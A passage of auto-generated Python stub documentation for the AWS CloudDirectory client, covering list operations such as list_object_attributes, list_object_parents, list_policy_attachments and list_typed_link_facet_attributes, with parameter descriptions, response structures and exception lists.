:type SchemaArn: string
:param SchemaArn: The response for ListManagedSchemaArns. When this parameter is used, all minor version ARNs for a major version are listed.
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
SchemaArns (list) --
The ARNs for all AWS managed schemas.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_object_attributes(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None, FacetFilter=None):
"""
Lists all attributes that are associated with an object.
See also: AWS API Documentation
Exceptions
:example: response = client.list_object_attributes(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL',
FacetFilter={
'SchemaArn': 'string',
'FacetName': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:type FacetFilter: dict
:param FacetFilter: Used to filter the list of object attributes that are associated with a certain facet.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Attributes (list) --
Attributes map that is associated with the object. AttributeArn is the key, and attribute value is the value.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.FacetValidationException
"""
pass
def list_object_children(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Returns a paginated list of child objects that are associated with a given object.
See also: AWS API Documentation
Exceptions
:example: response = client.list_object_children(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object for which child objects are being listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:rtype: dict
ReturnsResponse Syntax
{
'Children': {
'string': 'string'
},
'NextToken': 'string'
}
Response Structure
(dict) --
Children (dict) --
Children structure, which is a map with key as the LinkName and ObjectIdentifier as the value.
(string) --
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.NotNodeException
:return: {
'Children': {
'string': 'string'
},
'NextToken': 'string'
}
:returns:
(string) --
(string) --
"""
pass
def list_object_parent_paths(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None):
"""
Retrieves all available parent paths for any object type such as node, leaf node, policy node, and index node objects. For more information about objects, see Directory Structure .
Use this API to evaluate all parents for an object. The call returns all objects from the root of the directory up to the requested object. The API returns the number of paths based on user-defined MaxResults , in case there are multiple paths to the parent. The order of the paths and nodes returned is consistent among multiple API calls unless the objects are deleted or moved. Paths not leading to the directory root are ignored from the target object.
See also: AWS API Documentation
Exceptions
:example: response = client.list_object_parent_paths(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory to which the parent path applies.\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object whose parent paths are listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:rtype: dict
ReturnsResponse Syntax
{
'PathToObjectIdentifiersList': [
{
'Path': 'string',
'ObjectIdentifiers': [
'string',
]
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
PathToObjectIdentifiersList (list) --
Returns the path to the ObjectIdentifiers that are associated with the directory.
(dict) --
Returns the path to the ObjectIdentifiers that is associated with the directory.
Path (string) --
The path that is used to identify the object starting from directory root.
ObjectIdentifiers (list) --
Lists ObjectIdentifiers starting from directory root to the object in the request.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'PathToObjectIdentifiersList': [
{
'Path': 'string',
'ObjectIdentifiers': [
'string',
]
},
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_object_parents(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None, IncludeAllLinksToEachParent=None):
"""
Lists parent objects that are associated with a given object in pagination fashion.
See also: AWS API Documentation
Exceptions
:example: response = client.list_object_parents(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL',
IncludeAllLinksToEachParent=True|False
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object for which parent objects are being listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:type IncludeAllLinksToEachParent: boolean
:param IncludeAllLinksToEachParent: When set to True, returns all ListObjectParentsResponse$ParentLinks . There could be multiple links between a parent-child pair.
:rtype: dict
ReturnsResponse Syntax
{
'Parents': {
'string': 'string'
},
'NextToken': 'string',
'ParentLinks': [
{
'ObjectIdentifier': 'string',
'LinkName': 'string'
},
]
}
Response Structure
(dict) --
Parents (dict) --
The parent structure, which is a map with key as the ObjectIdentifier and LinkName as the value.
(string) --
(string) --
NextToken (string) --
The pagination token.
ParentLinks (list) --
Returns a list of parent reference and LinkName Tuples.
(dict) --
A pair of ObjectIdentifier and LinkName.
ObjectIdentifier (string) --
The ID that is associated with the object.
LinkName (string) --
The name of the link between the parent and the child object.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.CannotListParentOfRootException
:return: {
'Parents': {
'string': 'string'
},
'NextToken': 'string',
'ParentLinks': [
{
'ObjectIdentifier': 'string',
'LinkName': 'string'
},
]
}
:returns:
(string) --
(string) --
"""
pass
def list_object_policies(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Returns policies attached to an object in pagination fashion.
See also: AWS API Documentation
Exceptions
:example: response = client.list_object_policies(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where objects reside. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nReference that identifies the object for which policies will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:rtype: dict
ReturnsResponse Syntax
{
'AttachedPolicyIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
AttachedPolicyIds (list) --
A list of policy ObjectIdentifiers , that are attached to the object.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'AttachedPolicyIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_outgoing_typed_links(DirectoryArn=None, ObjectReference=None, FilterAttributeRanges=None, FilterTypedLink=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Returns a paginated list of all the outgoing TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.list_outgoing_typed_links(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
FilterAttributeRanges=[
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
FilterTypedLink={
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where you want to list the typed links.\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nA reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type FilterAttributeRanges: list
:param FilterAttributeRanges: Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type FilterTypedLink: dict
:param FilterTypedLink: Filters are interpreted in the order of the attributes defined on the typed link facet, not the order they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level to execute the request at.
:rtype: dict
ReturnsResponse Syntax
{
'TypedLinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
TypedLinkSpecifiers (list) --
Returns a typed link specifier as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'TypedLinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def list_policy_attachments(DirectoryArn=None, PolicyReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Returns all of the ObjectIdentifiers to which a given policy is attached.
See also: AWS API Documentation
Exceptions
:example: response = client.list_policy_attachments(
DirectoryArn='string',
PolicyReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where objects reside. For more information, see arns .\n
:type PolicyReference: dict
:param PolicyReference: [REQUIRED]\nThe reference that identifies the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of items to be retrieved in a single call. This is an approximate number.
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:rtype: dict
ReturnsResponse Syntax
{
'ObjectIdentifiers': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
ObjectIdentifiers (list) --
A list of ObjectIdentifiers to which the policy is attached.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotPolicyException
:return: {
'ObjectIdentifiers': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_published_schema_arns(SchemaArn=None, NextToken=None, MaxResults=None):
"""
Lists the major version families of each published schema. If a major version ARN is provided as SchemaArn , the minor version revisions in that family are listed instead.
See also: AWS API Documentation
Exceptions
:example: response = client.list_published_schema_arns(
SchemaArn='string',
NextToken='string',
MaxResults=123
)
:type SchemaArn: string
:param SchemaArn: The response for ListPublishedSchemaArns when this parameter is used will list all minor version ARNs for a major version.
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
SchemaArns (list) --
The ARNs of published schemas.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_tags_for_resource(ResourceArn=None, NextToken=None, MaxResults=None):
"""
Returns tags for a resource. Tagging is currently supported only for directories with a limit of 50 tags per directory. All 50 tags are returned for a given directory with this API call.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
ResourceArn='string',
NextToken='string',
MaxResults=123
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource. Tagging is only supported for directories.\n
:type NextToken: string
:param NextToken: The pagination token. This is for future use. Currently pagination is not supported for tagging.
:type MaxResults: integer
:param MaxResults: The MaxResults parameter sets the maximum number of results returned in a single page. This is for future use and is not supported currently.
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Tags (list) --
A list of tag key value pairs that are associated with the response.
(dict) --
The tag structure that contains a tag key and value.
Key (string) --
The key that is associated with the tag.
Value (string) --
The value that is associated with the tag.
NextToken (string) --
The token to use to retrieve the next page of results. This value is null when there are no more results to return.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidTaggingRequestException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidTaggingRequestException
"""
pass
def list_typed_link_facet_attributes(SchemaArn=None, Name=None, NextToken=None, MaxResults=None):
"""
Returns a paginated list of all attribute definitions for a particular TypedLinkFacet . For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.list_typed_link_facet_attributes(
SchemaArn='string',
Name='string',
NextToken='string',
MaxResults=123
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe unique name of the typed link facet.\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'Attributes': [
{
'Name': 'string',
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Attributes (list) --
An ordered set of attributes associate with the typed link.
(dict) --
A typed link attribute definition.
Name (string) --
The unique name of the typed link attribute.
Type (string) --
The type of the attribute.
DefaultValue (dict) --
The default value of the attribute (if configured).
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
IsImmutable (boolean) --
Whether the attribute is mutable or not.
Rules (dict) --
